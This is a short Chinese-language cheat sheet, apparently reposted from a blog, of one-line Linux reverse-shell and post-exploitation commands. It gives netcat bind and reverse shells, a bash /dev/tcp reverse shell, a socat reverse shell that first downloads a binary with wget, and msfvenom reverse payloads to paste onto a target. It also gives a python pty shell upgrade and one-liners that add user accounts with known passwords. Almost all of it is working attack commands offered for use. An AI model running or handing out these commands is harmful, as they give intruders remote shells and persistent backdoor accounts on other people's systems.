1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
1 nc开启本地监听发布
bash
服务
1
# nc -lvvp 12345 -t -e /bin/bash
2 常用反弹shell一句话
(1)
bash
反弹一句话
1
# bash -i >& /dev/tcp/192.168.1.123/12345 0>&1
(2) nc 反弹一句话
1
# nc 192.168.1.123 12345 -t -e /bin/bash
(3) socat 反弹一句话
123
# wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat # 第一步:下载socat到/tmp目录下# chmod 755 /tmp/socat # 第二步:给socaat授予可以执行权限# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.41:12345 # 第三步:反弹shell到目标主机的12345端口
3 利用msfvenom获取反弹一句话
(1) 查询 reverse payload 反弹路径
1
# msfvenom -l payloads 'cmd/unix/reverse'
(2) 生成相关反弹一句话
1
# msfvenom -p cmd/unix/reverse_xxxx lhost=1.1.1.1 lport=12345 R
剩下的就是将生成的payload 反弹一句话直接复制到靶机上直接运行即反弹一个shell出来。
4 使用python获取标准shell
直接在获取的废标准shell上直接运行一下python 一句话即可获取一个标准的shell。
1
# python -c "import pty;pty.spawn('/bin/bash')"
5 linux 一句话添加账户
(1)chpasswd 方法
1
# useradd guest;echo 'guest:123456'|chpasswd
(2)
useradd
-p 方法
1
# useradd -p `openssl passwd 123456` guest
(3)
echo
-e 方法
1
# useradd test;echo -e "123456\n123456\n" |passwd test
|
【转】http://bobao.360.cn/learning/detail/4551.html
本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1973123,如需转载请自行联系原作者